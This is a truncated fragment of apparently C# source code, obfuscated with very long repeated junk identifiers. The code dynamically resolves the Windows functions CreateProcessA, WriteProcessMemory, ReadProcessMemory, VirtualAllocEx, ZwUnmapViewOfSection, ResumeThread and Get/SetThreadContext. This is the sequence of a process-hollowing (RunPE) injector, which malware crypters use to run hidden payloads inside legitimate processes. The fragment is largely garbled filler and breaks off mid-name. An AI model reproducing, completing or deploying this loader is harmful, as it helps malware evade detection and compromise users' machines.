DSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUsadf>("kernel32", "CreateProcessA");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUha hkujkrwesffdssfoueowdUha1 = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUha>("kernel32", "WriteProcessMemory");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUga hkujkrwesffdssfoueowdUga1 = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUga>("kernel32", "ReadProcessMemory");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU3 hkujkrwesffdssfoueowdU3 = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU3>("kernel32", "VirtualAllocEx");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU2 hkujkrwesffdssfoueowdU2 = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU2>("ntdll", "ZwUnmapViewOfSection");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU1 hkujkrwesffdssfoueowdU1 = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU1>("kernel32", "ResumeThread");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU9 hkujkrwesffdssfoueowdU9 = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU9>("kernel32", "GetThreadContext");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU5 hkujkrwesffdssfoueowdU5 = rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUc<rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU5>("kernel32", "SetThreadContext");
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU context = new rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKED